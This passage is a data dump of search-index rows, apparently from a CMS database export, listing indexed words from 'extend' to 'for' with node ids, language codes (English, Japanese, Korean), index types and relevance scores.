('extend', 195, 'en', 'node_search', 1),
('extend', 198, 'en', 'node_search', 1),
('extended', 150, 'en', 'node_search', 1),
('extending', 29, 'en', 'help_search', 10.2817),
('extending', 29, 'ja', 'help_search', 10.2817),
('extending', 29, 'ko', 'help_search', 10.2817),
('extending', 33, 'en', 'help_search', 57),
('extending', 33, 'ja', 'help_search', 57),
('extending', 33, 'ko', 'help_search', 57),
('extends', 33, 'en', 'help_search', 1),
('extends', 33, 'ja', 'help_search', 1),
('extends', 33, 'ko', 'help_search', 1),
('extension', 30, 'en', 'help_search', 4.70731),
('extension', 30, 'ja', 'help_search', 4.70731),
('extension', 30, 'ko', 'help_search', 4.70731),
('extension', 51, 'en', 'help_search', 1),
('extension', 51, 'ja', 'help_search', 1),
('extension', 51, 'ko', 'help_search', 1),
('external', 56, 'en', 'help_search', 1),
('external', 56, 'ja', 'help_search', 1),
('external', 56, 'ko', 'help_search', 1),
('facebook', 87, 'en', 'node_search', 1),
('facebook', 87, 'ja', 'node_search', 0.76188),
('facebook', 155, 'en', 'node_search', 1),
('facebook', 155, 'ja', 'node_search', 0.679856),
('facilitate', 24, 'en', 'node_search', 0.879565),
('facilitate', 37, 'en', 'help_search', 1),
('facilitate', 37, 'ja', 'help_search', 1),
('facilitate', 37, 'ko', 'help_search', 1),
('facilitate', 135, 'en', 'node_search', 1),
('facilitate', 142, 'en', 'node_search', 1),
('facilitated', 138, 'en', 'node_search', 1),
('facilitating', 136, 'en', 'node_search', 1),
('facility', 162, 'en', 'node_search', 1),
('factories', 24, 'en', 'node_search', 1.84838),
('factors', 37, 'en', 'help_search', 1),
('factors', 37, 'ja', 'help_search', 1),
('factors', 37, 'ko', 'help_search', 1),
('factors', 66, 'en', 'help_search', 1),
('factors', 66, 'ja', 'help_search', 1),
('fair', 24, 'en', 'node_search', 0.848323),
('fair', 24, 'ja', 'node_search', 0.476356),
('fairpriced', 27, 'en', 'node_search', 0.707906),
('false', 31, 'ja', 'help_search', 0.889397),
('familiar', 24, 'en', 'node_search', 1),
('families', 154, 'en', 'node_search', 1),
('families', 157, 'en', 'node_search', 1),
('family', 62, 'en', 'node_search', 0.836446),
('family', 156, 'en', 'node_search', 1),
('famous', 95, 'en', 'node_search', 1),
('fantastic', 116, 'en', 'node_search', 1),
('far', 76, 'en', 'help_search', 1),
('far', 76, 'ja', 'help_search', 1),
('far', 76, 'ko', 'help_search', 1),
('farewell', 156, 'en', 'node_search', 1),
('farewell', 157, 'en', 'node_search', 1),
('faster', 37, 'en', 'help_search', 2),
('faster', 37, 'ja', 'help_search', 2),
('faster', 37, 'ko', 'help_search', 2),
('faster', 67, 'en', 'help_search', 1),
('faster', 67, 'ja', 'help_search', 1),
('faster', 67, 'ko', 'help_search', 1),
('faulty', 28, 'en', 'help_search', 1),
('faulty', 28, 'ja', 'help_search', 1),
('faulty', 28, 'ko', 'help_search', 1),
('fcaw', 31, 'en', 'node_search', 1),
('fdsdf', 206, 'ja', 'node_search', 1),
('feature', 46, 'en', 'help_search', 1),
('feature', 46, 'ja', 'help_search', 1),
('feature', 46, 'ko', 'help_search', 1),
('features', 33, 'en', 'help_search', 2),
('features', 33, 'ja', 'help_search', 2),
('features', 33, 'ko', 'help_search', 2),
('features', 43, 'en', 'help_search', 2),
('features', 43, 'ja', 'help_search', 2),
('features', 43, 'ko', 'help_search', 2),
('february', 80, 'en', 'node_search', 4),
('february', 177, 'en', 'node_search', 6),
('fee', 31, 'en', 'node_search', 2),
('fee', 62, 'en', 'node_search', 3.62831),
('fee', 155, 'en', 'node_search', 1),
('feed', 88, 'en', 'help_search', 1),
('feed', 88, 'ja', 'help_search', 1),
('feed', 88, 'ko', 'help_search', 1),
('feed', 93, 'en', 'help_search', 2),
('feed', 93, 'ja', 'help_search', 2),
('feed', 93, 'ko', 'help_search', 2),
('feel', 1, 'en', 'node_search', 1),
('feel', 29, 'en', 'help_search', 1),
('feel', 29, 'ja', 'help_search', 1),
('feel', 29, 'ko', 'help_search', 1),
('feels', 120, 'en', 'node_search', 1),
('fees', 5, 'en', 'node_search', 2),
('fees', 5, 'ko', 'node_search', 2),
('fees', 18, 'en', 'node_search', 1),
('fees', 18, 'ko', 'node_search', 1),
('fees', 31, 'en', 'node_search', 2),
('female', 4, 'en', 'node_search', 1),
('female', 4, 'ja', 'node_search', 1),
('ferry', 5, 'en', 'node_search', 1),
('ferry', 5, 'ko', 'node_search', 1),
('few', 61, 'en', 'help_search', 1),
('few', 61, 'ja', 'help_search', 1),
('few', 61, 'ko', 'help_search', 1),
('fewer', 67, 'en', 'help_search', 1),
('fewer', 67, 'ja', 'help_search', 1),
('fewer', 67, 'ko', 'help_search', 1),
('field', 3, 'en', 'node_search', 1),
('field', 3, 'ko', 'node_search', 1),
('field', 5, 'en', 'help_search', 1),
('field', 5, 'ja', 'help_search', 1),
('field', 5, 'ko', 'help_search', 1),
('field', 7, 'en', 'help_search', 12),
('field', 7, 'en', 'node_search', 4),
('field', 7, 'ja', 'help_search', 12),
('field', 7, 'ko', 'help_search', 12),
('field', 7, 'ko', 'node_search', 4),
('field', 8, 'en', 'help_search', 3),
('field', 8, 'ja', 'help_search', 3),
('field', 8, 'ko', 'help_search', 3),
('field', 9, 'en', 'help_search', 3),
('field', 9, 'ja', 'help_search', 3),
('field', 9, 'ko', 'help_search', 3),
('field', 10, 'en', 'node_search', 2),
('field', 10, 'ko', 'node_search', 2),
('field', 11, 'en', 'help_search', 1.89272),
('field', 11, 'ja', 'help_search', 1.89272),
('field', 11, 'ko', 'help_search', 1.89272),
('field', 24, 'en', 'help_search', 58),
('field', 24, 'ja', 'help_search', 58),
('field', 24, 'ko', 'help_search', 58),
('field', 25, 'en', 'help_search', 30),
('field', 25, 'ja', 'help_search', 30),
('field', 26, 'en', 'help_search', 3),
('field', 26, 'ja', 'help_search', 3),
('field', 26, 'ko', 'help_search', 3),
('field', 27, 'en', 'help_search', 54.9931),
('field', 27, 'ja', 'help_search', 54.9931),
('field', 27, 'ko', 'help_search', 54.9931),
('field', 28, 'en', 'help_search', 3),
('field', 28, 'ja', 'help_search', 3),
('field', 28, 'ko', 'help_search', 3),
('field', 31, 'ja', 'help_search', 90.2698),
('field', 35, 'en', 'help_search', 5),
('field', 35, 'ja', 'help_search', 5),
('field', 35, 'ko', 'help_search', 5),
('field', 40, 'en', 'help_search', 1),
('field', 40, 'ja', 'help_search', 1),
('field', 40, 'ko', 'help_search', 1),
('field', 42, 'en', 'help_search', 1),
('field', 42, 'ja', 'help_search', 1),
('field', 42, 'ko', 'help_search', 1),
('field', 47, 'en', 'help_search', 1),
('field', 47, 'ja', 'help_search', 1),
('field', 47, 'ko', 'help_search', 1),
('field', 48, 'en', 'help_search', 2),
('field', 48, 'ja', 'help_search', 2),
('field', 48, 'ko', 'help_search', 2),
('field', 54, 'en', 'help_search', 12),
('field', 54, 'ja', 'help_search', 12),
('field', 54, 'ko', 'help_search', 12),
('field', 59, 'en', 'help_search', 1),
('field', 59, 'ja', 'help_search', 1),
('field', 59, 'ko', 'help_search', 1),
('field', 60, 'en', 'help_search', 4),
('field', 60, 'ja', 'help_search', 4),
('field', 60, 'ko', 'help_search', 4),
('field', 61, 'en', 'help_search', 1),
('field', 61, 'ja', 'help_search', 1),
('field', 61, 'ko', 'help_search', 1),
('field', 62, 'en', 'help_search', 1),
('field', 62, 'ja', 'help_search', 1),
('field', 62, 'ko', 'help_search', 1),
('field', 79, 'en', 'help_search', 13),
('field', 79, 'ja', 'help_search', 13),
('field', 79, 'ko', 'help_search', 13),
('field', 80, 'en', 'help_search', 4.77171),
('field', 80, 'ja', 'help_search', 4.77171),
('field', 80, 'ko', 'help_search', 4.77171),
('field', 89, 'en', 'help_search', 3),
('field', 89, 'ja', 'help_search', 3),
('field', 89, 'ko', 'help_search', 3),
('field', 90, 'en', 'help_search', 1),
('field', 90, 'ja', 'help_search', 1),
('field', 90, 'ko', 'help_search', 1),
('field', 92, 'en', 'help_search', 2),
('field', 92, 'ja', 'help_search', 2),
('field', 92, 'ko', 'help_search', 2),
('field', 189, 'en', 'node_search', 1),
('fields', 2, 'en', 'help_search', 1),
('fields', 2, 'ja', 'help_search', 1),
('fields', 2, 'ko', 'help_search', 1),
('fields', 5, 'en', 'help_search', 6),
('fields', 5, 'ja', 'help_search', 6),
('fields', 5, 'ko', 'help_search', 6),
('fields', 7, 'en', 'help_search', 3),
('fields', 7, 'ja', 'help_search', 3),
('fields', 7, 'ko', 'help_search', 3),
('fields', 8, 'en', 'help_search', 2),
('fields', 8, 'ja', 'help_search', 2),
('fields', 8, 'ko', 'help_search', 2),
('fields', 9, 'en', 'help_search', 1),
('fields', 9, 'ja', 'help_search', 1),
('fields', 9, 'ko', 'help_search', 1),
('fields', 11, 'en', 'help_search', 6.76891),
('fields', 11, 'ja', 'help_search', 6.76891),
('fields', 11, 'ko', 'help_search', 6.76891),
('fields', 16, 'en', 'help_search', 1),
('fields', 16, 'ja', 'help_search', 1),
('fields', 16, 'ko', 'help_search', 1),
('fields', 17, 'en', 'help_search', 55),
('fields', 17, 'ja', 'help_search', 55),
('fields', 17, 'ko', 'help_search', 55),
('fields', 18, 'en', 'help_search', 3),
('fields', 18, 'ja', 'help_search', 3),
('fields', 18, 'ko', 'help_search', 3),
('fields', 19, 'en', 'help_search', 3),
('fields', 19, 'ja', 'help_search', 3),
('fields', 19, 'ko', 'help_search', 3),
('fields', 20, 'en', 'help_search', 2),
('fields', 20, 'ja', 'help_search', 2),
('fields', 20, 'ko', 'help_search', 2),
('fields', 24, 'en', 'help_search', 9),
('fields', 24, 'ja', 'help_search', 9),
('fields', 24, 'ko', 'help_search', 9),
('fields', 25, 'en', 'help_search', 3),
('fields', 25, 'ja', 'help_search', 3),
('fields', 26, 'en', 'help_search', 3),
('fields', 26, 'ja', 'help_search', 3),
('fields', 26, 'ko', 'help_search', 3),
('fields', 27, 'en', 'help_search', 9),
('fields', 27, 'ja', 'help_search', 9),
('fields', 27, 'ko', 'help_search', 9),
('fields', 28, 'en', 'help_search', 1),
('fields', 28, 'ja', 'help_search', 1),
('fields', 28, 'ko', 'help_search', 1),
('fields', 29, 'en', 'help_search', 2),
('fields', 29, 'ja', 'help_search', 2),
('fields', 29, 'ko', 'help_search', 2),
('fields', 31, 'ja', 'help_search', 36.2034),
('fields', 35, 'en', 'help_search', 5),
('fields', 35, 'ja', 'help_search', 5),
('fields', 35, 'ko', 'help_search', 5),
('fields', 42, 'en', 'help_search', 1),
('fields', 42, 'ja', 'help_search', 1),
('fields', 42, 'ko', 'help_search', 1),
('fields', 43, 'en', 'help_search', 0.976851),
('fields', 43, 'ja', 'help_search', 0.976851),
('fields', 43, 'ko', 'help_search', 0.976851),
('fields', 44, 'en', 'help_search', 1),
('fields', 44, 'ja', 'help_search', 1),
('fields', 44, 'ko', 'help_search', 1),
('fields', 54, 'en', 'help_search', 10),
('fields', 54, 'ja', 'help_search', 10),
('fields', 54, 'ko', 'help_search', 10),
('fields', 59, 'en', 'help_search', 1),
('fields', 59, 'ja', 'help_search', 1),
('fields', 59, 'ko', 'help_search', 1),
('fields', 60, 'en', 'help_search', 9),
('fields', 60, 'ja', 'help_search', 9),
('fields', 60, 'ko', 'help_search', 9),
('fields', 62, 'en', 'help_search', 4),
('fields', 62, 'ja', 'help_search', 4),
('fields', 62, 'ko', 'help_search', 4),
('fields', 79, 'en', 'help_search', 4),
('fields', 79, 'ja', 'help_search', 4),
('fields', 79, 'ko', 'help_search', 4),
('fields', 80, 'en', 'help_search', 3.92384),
('fields', 80, 'ja', 'help_search', 3.92384),
('fields', 80, 'ko', 'help_search', 3.92384),
('fields', 89, 'en', 'help_search', 8),
('fields', 89, 'ja', 'help_search', 8),
('fields', 89, 'ko', 'help_search', 8),
('fields', 91, 'en', 'help_search', 4),
('fields', 91, 'ja', 'help_search', 4),
('fields', 91, 'ko', 'help_search', 4),
('fields', 92, 'en', 'help_search', 2),
('fields', 92, 'ja', 'help_search', 2),
('fields', 92, 'ko', 'help_search', 2),
('fields', 93, 'en', 'help_search', 5),
('fields', 93, 'ja', 'help_search', 5),
('fields', 93, 'ko', 'help_search', 5),
('file', 12, 'en', 'help_search', 1),
('file', 12, 'ja', 'help_search', 1),
('file', 12, 'ko', 'help_search', 1),
('file', 13, 'en', 'help_search', 2),
('file', 13, 'ja', 'help_search', 2),
('file', 13, 'ko', 'help_search', 2),
('file', 14, 'en', 'help_search', 1),
('file', 14, 'ja', 'help_search', 1),
('file', 14, 'ko', 'help_search', 1),
('file', 30, 'en', 'help_search', 2.47298),
('file', 30, 'ja', 'help_search', 2.47298),
('file', 30, 'ko', 'help_search', 2.47298),
('file', 35, 'en', 'help_search', 2),
('file', 35, 'ja', 'help_search', 2),
('file', 35, 'ko', 'help_search', 2),
('file', 37, 'en', 'help_search', 19.8513),
('file', 37, 'ja', 'help_search', 19.8513),
('file', 37, 'ko', 'help_search', 19.8513),
('file', 46, 'en', 'help_search', 1),
('file', 46, 'ja', 'help_search', 1),
('file', 46, 'ko', 'help_search', 1),
('file', 51, 'en', 'help_search', 32),
('file', 51, 'ja', 'help_search', 32),
('file', 51, 'ko', 'help_search', 32),
('files', 6, 'en', 'help_search', 0.96498),
('files', 6, 'ja', 'help_search', 0.96498),
('files', 6, 'ko', 'help_search', 0.96498),
('files', 12, 'en', 'help_search', 1),
('files', 12, 'ja', 'help_search', 1),
('files', 12, 'ko', 'help_search', 1),
('files', 29, 'en', 'help_search', 2),
('files', 29, 'ja', 'help_search', 2),
('files', 29, 'ko', 'help_search', 2),
('files', 30, 'en', 'help_search', 2.57767),
('files', 30, 'ja', 'help_search', 2.57767),
('files', 30, 'ko', 'help_search', 2.57767),
('files', 31, 'ja', 'help_search', 2),
('files', 33, 'en', 'help_search', 1),
('files', 33, 'ja', 'help_search', 1),
('files', 33, 'ko', 'help_search', 1),
('files', 35, 'en', 'help_search', 1),
('files', 35, 'ja', 'help_search', 1),
('files', 35, 'ko', 'help_search', 1),
('files', 37, 'en', 'help_search', 1),
('files', 37, 'ja', 'help_search', 1),
('files', 37, 'ko', 'help_search', 1),
('files', 43, 'en', 'help_search', 1),
('files', 43, 'ja', 'help_search', 1),
('files', 43, 'ko', 'help_search', 1),
('files', 62, 'en', 'help_search', 1),
('files', 62, 'ja', 'help_search', 1),
('files', 62, 'ko', 'help_search', 1),
('filing', 30, 'en', 'node_search', 2),
('fill', 17, 'en', 'help_search', 1),
('fill', 17, 'ja', 'help_search', 1),
('fill', 17, 'ko', 'help_search', 1),
('fill', 19, 'en', 'help_search', 1),
('fill', 19, 'ja', 'help_search', 1),
('fill', 19, 'ko', 'help_search', 1),
('fill', 20, 'en', 'help_search', 1),
('fill', 20, 'ja', 'help_search', 1),
('fill', 20, 'ko', 'help_search', 1),
('fill', 37, 'en', 'help_search', 0.899454),
('fill', 37, 'ja', 'help_search', 0.899454),
('fill', 37, 'ko', 'help_search', 0.899454),
('fill', 59, 'en', 'help_search', 1),
('fill', 59, 'ja', 'help_search', 1),
('fill', 59, 'ko', 'help_search', 1),
('filled', 164, 'en', 'node_search', 1),
('filled', 174, 'en', 'node_search', 1),
('filled', 177, 'en', 'node_search', 1),
('filling', 42, 'en', 'help_search', 1),
('filling', 42, 'ja', 'help_search', 1),
('filling', 42, 'ko', 'help_search', 1),
('filter', 28, 'en', 'help_search', 12.7833),
('filter', 28, 'ja', 'help_search', 12.7833),
('filter', 28, 'ko', 'help_search', 12.7833),
('filter', 40, 'en', 'help_search', 1),
('filter', 40, 'ja', 'help_search', 1),
('filter', 40, 'ko', 'help_search', 1),
('filter', 47, 'en', 'help_search', 1),
('filter', 47, 'ja', 'help_search', 1),
('filter', 47, 'ko', 'help_search', 1),
('filter', 61, 'en', 'help_search', 5),
('filter', 61, 'ja', 'help_search', 5),
('filter', 61, 'ko', 'help_search', 5),
('filter', 74, 'en', 'help_search', 1),
('filter', 74, 'ja', 'help_search', 1),
('filter', 74, 'ko', 'help_search', 1),
('filter', 75, 'en', 'help_search', 1),
('filter', 75, 'ja', 'help_search', 1),
('filter', 75, 'ko', 'help_search', 1),
('filter', 76, 'en', 'help_search', 1),
('filter', 76, 'ja', 'help_search', 1),
('filter', 76, 'ko', 'help_search', 1),
('filter', 87, 'en', 'help_search', 5),
('filter', 87, 'ja', 'help_search', 5),
('filter', 87, 'ko', 'help_search', 5),
('filter', 91, 'en', 'help_search', 8),
('filter', 91, 'ja', 'help_search', 8),
('filter', 91, 'ko', 'help_search', 8),
('filter', 93, 'en', 'help_search', 5.9534),
('filter', 93, 'ja', 'help_search', 5.9534),
('filter', 93, 'ko', 'help_search', 5.9534),
('filtering', 9, 'en', 'help_search', 1),
('filtering', 9, 'ja', 'help_search', 1),
('filtering', 9, 'ko', 'help_search', 1),
('filtering', 68, 'en', 'help_search', 0.889397),
('filtering', 68, 'ja', 'help_search', 0.889397),
('filtering', 68, 'ko', 'help_search', 0.889397),
('filtering', 90, 'en', 'help_search', 1),
('filtering', 90, 'ja', 'help_search', 1),
('filtering', 90, 'ko', 'help_search', 1),
('filters', 23, 'en', 'help_search', 2.83669),
('filters', 23, 'ja', 'help_search', 2.83669),
('filters', 23, 'ko', 'help_search', 2.83669),
('filters', 28, 'en', 'help_search', 72.0452),
('filters', 28, 'ja', 'help_search', 72.0452),
('filters', 28, 'ko', 'help_search', 72.0452),
('filters', 52, 'en', 'help_search', 1),
('filters', 52, 'ja', 'help_search', 1),
('filters', 52, 'ko', 'help_search', 1),
('filters', 61, 'en', 'help_search', 2),
('filters', 61, 'ja', 'help_search', 2),
('filters', 61, 'ko', 'help_search', 2),
('filters', 93, 'en', 'help_search', 6.48204),
('filters', 93, 'ja', 'help_search', 6.48204),
('filters', 93, 'ko', 'help_search', 6.48204),
('finally', 68, 'en', 'help_search', 0.822065),
('finally', 68, 'ja', 'help_search', 0.822065),
('finally', 68, 'ko', 'help_search', 0.822065),
('financial', 3, 'en', 'node_search', 1),
('financial', 3, 'ko', 'node_search', 1),
('financial', 27, 'en', 'node_search', 1),
('find', 1, 'en', 'help_search', 1),
('find', 1, 'ja', 'help_search', 1),
('find', 1, 'ko', 'help_search', 1),
('find', 3, 'en', 'help_search', 2),
('find', 3, 'en', 'node_search', 1),
('find', 3, 'ja', 'help_search', 2),
('find', 3, 'ko', 'help_search', 2),
('find', 3, 'ko', 'node_search', 1),
('find', 9, 'en', 'help_search', 3),
('find', 9, 'ja', 'help_search', 3),
('find', 9, 'ko', 'help_search', 3),
('find', 14, 'en', 'help_search', 1),
('find', 14, 'ja', 'help_search', 1),
('find', 14, 'ko', 'help_search', 1),
('find', 16, 'en', 'help_search', 2),
('find', 16, 'ja', 'help_search', 2),
('find', 16, 'ko', 'help_search', 2),
('find', 24, 'en', 'help_search', 1),
('find', 24, 'ja', 'help_search', 1),
('find', 24, 'ko', 'help_search', 1),
('find', 25, 'en', 'help_search', 1),
('find', 25, 'ja', 'help_search', 1),
('find', 26, 'en', 'help_search', 1),
('find', 26, 'ja', 'help_search', 1),
('find', 26, 'ko', 'help_search', 1),
('find', 27, 'en', 'help_search', 1),
('find', 27, 'ja', 'help_search', 1),
('find', 27, 'ko', 'help_search', 1),
('find', 37, 'en', 'help_search', 0.866793),
('find', 37, 'ja', 'help_search', 0.866793),
('find', 37, 'ko', 'help_search', 0.866793),
('find', 39, 'en', 'help_search', 2),
('find', 39, 'ja', 'help_search', 2),
('find', 39, 'ko', 'help_search', 2),
('find', 42, 'en', 'help_search', 1),
('find', 42, 'ja', 'help_search', 1),
('find', 42, 'ko', 'help_search', 1),
('find', 43, 'en', 'help_search', 2),
('find', 43, 'ja', 'help_search', 2),
('find', 43, 'ko', 'help_search', 2),
('find', 51, 'en', 'help_search', 1),
('find', 51, 'ja', 'help_search', 1),
('find', 51, 'ko', 'help_search', 1),
('find', 53, 'en', 'help_search', 2),
('find', 53, 'ja', 'help_search', 2),
('find', 53, 'ko', 'help_search', 2),
('find', 61, 'en', 'help_search', 21),
('find', 61, 'ja', 'help_search', 21),
('find', 61, 'ko', 'help_search', 21),
('find', 65, 'en', 'help_search', 1),
('find', 65, 'ja', 'help_search', 1),
('find', 65, 'ko', 'help_search', 1),
('find', 87, 'en', 'help_search', 1),
('find', 87, 'ja', 'help_search', 1),
('find', 87, 'ko', 'help_search', 1),
('find', 88, 'en', 'help_search', 1),
('find', 88, 'ja', 'help_search', 1),
('find', 88, 'ko', 'help_search', 1),
('find', 89, 'en', 'help_search', 1),
('find', 89, 'ja', 'help_search', 1),
('find', 89, 'ko', 'help_search', 1),
('find', 91, 'en', 'help_search', 2),
('find', 91, 'ja', 'help_search', 2),
('find', 91, 'ko', 'help_search', 2),
('find', 92, 'en', 'help_search', 1),
('find', 92, 'ja', 'help_search', 1),
('find', 92, 'ko', 'help_search', 1),
('finesse', 62, 'en', 'node_search', 1),
('finish', 32, 'en', 'help_search', 1),
('finish', 32, 'ja', 'help_search', 1),
('finish', 32, 'ko', 'help_search', 1),
('finished', 73, 'en', 'help_search', 1),
('finished', 73, 'ja', 'help_search', 1),
('finished', 73, 'ko', 'help_search', 1),
('finished', 91, 'en', 'help_search', 1),
('finished', 91, 'ja', 'help_search', 1),
('finished', 91, 'ko', 'help_search', 1),
('fire', 27, 'en', 'node_search', 0.729424),
('first', 3, 'en', 'node_search', 1),
('first', 3, 'ko', 'node_search', 1),
('first', 7, 'en', 'help_search', 1),
('first', 7, 'ja', 'help_search', 1),
('first', 7, 'ko', 'help_search', 1),
('first', 9, 'en', 'node_search', 28),
('first', 17, 'en', 'node_search', 29),
('first', 28, 'en', 'help_search', 0.802752),
('first', 28, 'ja', 'help_search', 0.802752),
('first', 28, 'ko', 'help_search', 0.802752),
('first', 30, 'en', 'help_search', 0.76431),
('first', 30, 'ja', 'help_search', 0.76431),
('first', 30, 'ko', 'help_search', 0.76431),
('first', 33, 'en', 'help_search', 1),
('first', 33, 'ja', 'help_search', 1),
('first', 33, 'ko', 'help_search', 1),
('first', 37, 'en', 'help_search', 1.92384),
('first', 37, 'ja', 'help_search', 1.92384),
('first', 37, 'ko', 'help_search', 1.92384),
('first', 50, 'en', 'help_search', 1),
('first', 50, 'ja', 'help_search', 1),
('first', 50, 'ko', 'help_search', 1),
('first', 68, 'en', 'help_search', 1),
('first', 68, 'ja', 'help_search', 1),
('first', 68, 'ko', 'help_search', 1),
('first', 69, 'en', 'node_search', 1),
('first', 70, 'en', 'help_search', 1),
('first', 70, 'ja', 'help_search', 1),
('first', 70, 'ko', 'help_search', 1),
('first', 75, 'en', 'help_search', 2),
('first', 75, 'ja', 'help_search', 2),
('first', 75, 'ko', 'help_search', 2),
('first', 81, 'en', 'help_search', 1),
('first', 81, 'ja', 'help_search', 1),
('first', 81, 'ko', 'help_search', 1),
('first', 91, 'en', 'help_search', 1),
('first', 91, 'ja', 'help_search', 1),
('first', 91, 'ko', 'help_search', 1),
('first', 93, 'en', 'help_search', 1),
('first', 93, 'ja', 'help_search', 1),
('first', 93, 'ko', 'help_search', 1),
('first', 133, 'en', 'node_search', 1),
('fisheryrelated', 24, 'en', 'node_search', 0.909743),
('five', 154, 'en', 'node_search', 29),
('fix', 76, 'en', 'help_search', 1),
('fix', 76, 'ja', 'help_search', 1),
('fix', 76, 'ko', 'help_search', 1),
('fixed', 38, 'en', 'help_search', 1),
('fixed', 38, 'ja', 'help_search', 1),
('fixed', 38, 'ko', 'help_search', 1),
('fixed', 80, 'en', 'help_search', 1),
('fixed', 80, 'ja', 'help_search', 1),
('fixed', 80, 'ko', 'help_search', 1),
('fixing', 34, 'en', 'help_search', 11),
('fixing', 34, 'ja', 'help_search', 11),
('fixing', 34, 'ko', 'help_search', 11),
('flag', 11, 'en', 'help_search', 0.923838),
('flag', 11, 'ja', 'help_search', 0.923838),
('flag', 11, 'ko', 'help_search', 0.923838),
('flat', 80, 'en', 'help_search', 2),
('flat', 80, 'ja', 'help_search', 2),
('flat', 80, 'ko', 'help_search', 2),
('flight', 73, 'en', 'node_search', 1),
('flight', 156, 'en', 'node_search', 1),
('flight', 157, 'en', 'node_search', 1),
('floor', 11, 'en', 'node_search', 1),
('floor', 11, 'ja', 'node_search', 1),
('focusing', 23, 'en', 'help_search', 0.923838),
('focusing', 23, 'ja', 'help_search', 0.923838),
('focusing', 23, 'ko', 'help_search', 0.923838),
('follow', 7, 'en', 'help_search', 2),
('follow', 7, 'ja', 'help_search', 2),
('follow', 7, 'ko', 'help_search', 2),
('follow', 8, 'en', 'help_search', 1),
('follow', 8, 'ja', 'help_search', 1),
('follow', 8, 'ko', 'help_search', 1),
('follow', 18, 'en', 'help_search', 1),
('follow', 18, 'ja', 'help_search', 1),
('follow', 18, 'ko', 'help_search', 1),
('follow', 19, 'en', 'help_search', 1),
('follow', 19, 'ja', 'help_search', 1),
('follow', 19, 'ko', 'help_search', 1),
('follow', 23, 'en', 'help_search', 1),
('follow', 23, 'ja', 'help_search', 1),
('follow', 23, 'ko', 'help_search', 1),
('follow', 27, 'en', 'node_search', 1.73614),
('follow', 39, 'en', 'help_search', 1),
('follow', 39, 'ja', 'help_search', 1),
('follow', 39, 'ko', 'help_search', 1),
('follow', 45, 'en', 'help_search', 1),
('follow', 45, 'ja', 'help_search', 1),
('follow', 45, 'ko', 'help_search', 1),
('follow', 60, 'en', 'help_search', 1),
('follow', 60, 'ja', 'help_search', 1),
('follow', 60, 'ko', 'help_search', 1),
('follow', 63, 'en', 'help_search', 2),
('follow', 63, 'ja', 'help_search', 2),
('follow', 63, 'ko', 'help_search', 2),
('follow', 66, 'en', 'help_search', 1),
('follow', 66, 'ja', 'help_search', 1),
('follow', 67, 'en', 'help_search', 0.916736),
('follow', 67, 'ja', 'help_search', 0.916736),
('follow', 67, 'ko', 'help_search', 0.916736),
('follow', 77, 'en', 'node_search', 4),
('follow', 79, 'en', 'help_search', 1),
('follow', 79, 'ja', 'help_search', 1),
('follow', 79, 'ko', 'help_search', 1),
('follow', 88, 'en', 'help_search', 1),
('follow', 88, 'ja', 'help_search', 1),
('follow', 88, 'ko', 'help_search', 1),
('following', 4, 'en', 'node_search', 1),
('following', 4, 'ja', 'node_search', 1),
('following', 11, 'en', 'help_search', 0.902857),
('following', 11, 'ja', 'help_search', 0.902857),
('following', 11, 'ko', 'help_search', 0.902857),
('following', 24, 'en', 'node_search', 0.980874),
('following', 30, 'en', 'help_search', 0.830633),
('following', 30, 'en', 'node_search', 28),
('following', 30, 'ja', 'help_search', 0.830633),
('following', 30, 'ko', 'help_search', 0.830633),
('following', 31, 'ja', 'help_search', 0.920273),
('following', 35, 'en', 'help_search', 1),
('following', 35, 'ja', 'help_search', 1),
('following', 35, 'ko', 'help_search', 1),
('following', 37, 'en', 'help_search', 1),
('following', 37, 'ja', 'help_search', 1),
('following', 37, 'ko', 'help_search', 1),
('following', 43, 'en', 'help_search', 2),
('following', 43, 'ja', 'help_search', 2),
('following', 43, 'ko', 'help_search', 2),
('following', 44, 'en', 'help_search', 1),
('following', 44, 'ja', 'help_search', 1),
('following', 44, 'ko', 'help_search', 1),
('following', 56, 'en', 'help_search', 1),
('following', 56, 'ja', 'help_search', 1),
('following', 56, 'ko', 'help_search', 1),
('following', 90, 'en', 'help_search', 1),
('following', 90, 'ja', 'help_search', 1),
('following', 90, 'ko', 'help_search', 1),
('following', 93, 'en', 'help_search', 1),
('following', 93, 'ja', 'help_search', 1),
('following', 93, 'ko', 'help_search', 1),
('following', 154, 'en', 'node_search', 1),
('following', 167, 'en', 'node_search', 1),
('following', 169, 'en', 'node_search', 1),
('following', 173, 'en', 'node_search', 1),
('food', 18, 'en', 'node_search', 28),
('food', 18, 'ko', 'node_search', 28),
('food', 24, 'en', 'node_search', 0.957226),
('food', 68, 'en', 'node_search', 5),
('food', 68, 'ja', 'node_search', 1),
('food', 115, 'en', 'node_search', 1),
('food', 122, 'en', 'node_search', 1),
('food', 156, 'en', 'node_search', 28),
('food', 157, 'en', 'node_search', 28),
('food', 160, 'en', 'node_search', 32),
('food', 161, 'en', 'node_search', 33),
('food', 167, 'en', 'node_search', 30),
('food', 173, 'en', 'node_search', 33),
('food', 174, 'en', 'node_search', 30),
('food', 175, 'en', 'node_search', 30),
('food', 176, 'en', 'node_search', 30),
('food', 177, 'en', 'node_search', 30),
('food', 179, 'en', 'node_search', 30),
('food', 180, 'en', 'node_search', 29),
('food', 184, 'en', 'node_search', 30),
('food', 185, 'en', 'node_search', 30),
('food', 186, 'en', 'node_search', 30),
('food', 187, 'en', 'node_search', 7),
('food', 190, 'en', 'node_search', 6),
('food', 191, 'en', 'node_search', 5),
('food', 192, 'en', 'node_search', 3),
('food', 193, 'en', 'node_search', 6),
('food', 194, 'en', 'node_search', 6),
('food', 195, 'en', 'node_search', 3),
('food', 196, 'en', 'node_search', 6),
('food', 197, 'en', 'node_search', 6),
('food', 198, 'en', 'node_search', 3),
('food', 199, 'en', 'node_search', 6),
('footer', 93, 'en', 'help_search', 3.89144),
('footer', 93, 'ja', 'help_search', 3.89144),
('footer', 93, 'ko', 'help_search', 3.89144),
('for', 1, 'en', 'help_search', 4),
('for', 1, 'en', 'node_search', 1),
('for', 1, 'ja', 'help_search', 4),
('for', 1, 'ko', 'help_search', 4),
('for', 2, 'en', 'help_search', 22),
('for', 2, 'ja', 'help_search', 22),
('for', 2, 'ko', 'help_search', 22),
('for', 3, 'en', 'help_search', 1),
('for', 3, 'en', 'node_search', 6.98493),
('for', 3, 'ja', 'help_search', 1),
('for', 3, 'ko', 'help_search', 1),
('for', 3, 'ko', 'node_search', 6.97685),
('for', 4, 'en', 'help_search', 1),
('for', 4, 'ja', 'help_search', 1),
('for', 4, 'ko', 'help_search', 1),
('for', 4, 'ko', 'node_search', 27),
('for', 5, 'en', 'help_search', 2),
